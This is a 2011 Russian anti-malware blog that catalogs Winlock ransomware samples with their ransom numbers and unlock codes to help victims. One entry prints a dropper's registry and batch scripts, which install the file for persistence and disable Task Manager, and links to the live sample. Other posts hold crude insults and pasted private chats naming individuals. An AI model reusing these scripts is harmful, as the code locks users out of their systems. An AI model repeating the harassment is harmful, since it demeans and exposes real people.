Поиск по этому блогу

суббота, 22 октября 2011 г.

Trojan.Winlock.3256 на номер 89879427511

http://virusscan.jotti.org/ru/scanresult/1ac4b692c5535b6f7c04b93e446d2c6ab8f4eeff/c25266dcf2c1d6a77bb8104697bc1c4b3869081f


89879427511
89879427355
89879423566
89879426010

код: asd443034 или 99885522


--------------------------------------------------

89851216315
89165946833
89197754410
89168241419


код: 467268202 или 99885522






Trojan.Packed.21281 на номер 89653579723

Trojan.Packed.21756 на номер 9037075312

Trojan.Packed.21756 на номер 9057230834

Trojan.Winlock.3784 на номер 79879521769

http://virusscan.jotti.org/ru/scanresult/f29bc925d372e4d7c78eb519e424536fc25fc091



79879521769
+380662147559
79879521769
79117217263
79117219861

код: 111222333



Trojan.KillProc.6563 на номер 89179518106

Trojan.KillFiles.4091 на номер 89652110495

Trojan.KillProc.10563 на номер 89156345781

Trojan.Winlock.3209

http://www.virustotal.com/file-scan/report.html?id=5ae4197f8f54afb000bcbb32bc16bbd11289661885c6fa105f22813a88335d65-1316201959


89639431913
89050951606
89639432825
89050951955
89050951966

код: jorek5555 или 99885522







Trojan.Winlock.3256

http://www.virustotal.com/file-scan/report.html?id=2b7fc4807c2d2f846d3aa77a17d2ffab87eb52700af8d293b84b482cd590b09d-1315172450


89179525264
89179517981
89179525547
89179521861
89179517894
89179518106


код: 935318445 или 99885522



Trojan.Winlock.3020

http://virusscan.jotti.org/ru/scanresult/cbc1f99d22fa2d2c23ed77bf3b974075cdb83d31



U126713475959
U237473384789
U149993072497
U259175081196
U353025398919
U397954528276
U354443163924
U319154584161

код: 001144



Trojan.Winlock.3784 на номер 79179817221

http://virusscan.jotti.org/ru/scanresult/34365b08d31e45ba7f454dc997d9c35cb24525ed


+380662147559
+79179817221
+79179816432
+79873123680
+79179817228
+79179817233


код: 99885522



Trojan.WinLock.3333 на номер 89156415844

Trojan.Inject.54802 на номер 89101176148

Trojan.Inject.50964 на номер 89190487143

вторник, 18 октября 2011 г.

«Корректор» негодуе...

Клоун и жирный троль.....Я угораю...

Находится сцуко в постоянном когнитивном диссонансе между реальностью и желаемым потому что лох...Так как ебать ему некого начинает всем ебать мозг..Как правило самому себе так как остальные отмахиваются от него как от назойливой зеленой мухи..Частенько фонтанирует какими то бредовыми идеями..Двуликий сцуко Анус..Постоянно мечется между высокими идеалами и сделать кому нибудь падлу..




http://dl.dropbox.com/u/18334397/belyash.txt


Наташа Черная (22:28) :
блин беляш стал мягче
мне его два раза хотелось послать на хуй и обозвать последними словами, но...
Наташа Черная (22:28) :
у нас важное дело и я включила такую дипломатию
Наташа Черная (22:29) :
он со мнйо почувствует себя мачо, верь мне и верь в меня

смотри Андрей)
моё последнее сообщение
Сообщение для Максима Сокульского
сегодня в 0:27
ну я много не могу предложить)) просто пообщаться. Мне нравятся симпатичные парни и всё тут. Кстати, я вижу ты из Херсона. У меня был коллега. Он твой земляк. Симпатичный, но.. алкашня. пил каждый день водку. У нас дизайнерская контора была. Так вот когда наступил кризиз в стране, стали сокращать штаты, закрывать рекламу. И нам сильно задержали зарплату. И у него не было денег на водку. Так три, что он не пил... У него тряслись руки. И он был злой псих. Ужас. Вся его симпатичность сошла на нет. Естественно от дружбы ничо не осталось. А теперь мне приятно видеть, что в Херсоне есть и нормальные парни)))
Наташа Черная (2:19) :
Андрееей)))))))))))))))))))) Мн беляшь смари чё написал))
Наташа Черная (2:19) :
«Коректор иди на хер»
Наташа Черная (2:19) :
ахахаахахах
Наташа Черная (2:19) :
вот скатина)))

Trojan.Winlock.3333 с текстом 79kopilka4134


http://www.virustotal.com/file-scan/report.html?id=5d44adf1763b833ae3933d22c2bbe8ca05f78a11344d454904cef5a98af665d2-1318935879
номер: 1350
текст: 79kopilka4134
код: 111112222211111

номер: 8510
текст: 79kopilka4134
код: 111112222211111




----------------------------------------


http://www.virustotal.com/file-scan/report.html?id=2add2e3f3000a64ec247cf9c73d445ce71df7343431ca3e5f889cf036be81d2d-1318935679





номер:1350
текст:79kopilka4134
код:111222111


номер:7139
текст:79kopilka4134
код:111222111







Как уе...у с...ка

http://www.virustotal.com/file-scan/report.html?id=4ba85a918f5b41cc2a9a964b6180a693f676dd87cafe8ca39b173fdda451d8d8-1318861830

дропер(rar sfx) md5: 4ED4EACA0EAD5607A6F65563FF89E632
винлок md5: 958DD0E63C640B778399DA084CBA2893

В архиве
sttix.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sttix"="C:\\WINDOWS\\sttix.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system]
"DisableTaskMgr"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\system]
"DisableTaskMgr"=dword:00000001

sttix.cmd
copy /Y sttix.exe %SystemRoot%\*.*
regedit /s "sttix.reg"
shutdown /r

sttix.exe


лежит здесь http://rghost.ru/2589771*







Особенности заражения этим винлоком
-копирует себя в c:\windows\sttix.exe
-прописывается в реестре
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"sttix"=C:\WINDOWS\sttix.exe
-отключает диспетчер задач
-закрыть его можно нажав комбинацию клавиш Alt+F4
-в фоне играем милая песенка со словами ;)
Ты Пидр бля..Пидр
Как уебу сука
Это наша точка


Чтобы восстановить диспетчер задач удалите ключ реестра

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system]
"DisableTaskMgr"=dword:00000001
или измените на 00000000

понедельник, 17 октября 2011 г.

Trojan.Winlock.3333 на номер U115116195580

Trojan.Winlock.3333 на номер 8-(910)-712-36-30

Trojan.MBRlock.12 на номер 079099552636

http://www.virustotal.com/file-scan/report.html?id=f9779eeae006058518cf68ea13fb693b08091e489ff9c70c8a65c2ae164aee9c-1318846820


номер 079099552636
код: 70083421



Грузимся с Paragon Partition Manager....Код видно невооруженным глазом.


Как удалить без ввода кода

инструкция: http://rghost.ru/21429711
видео: http://rghost.ru/7215991

Иногда помогает перевод даты в биосе на 1 год вперед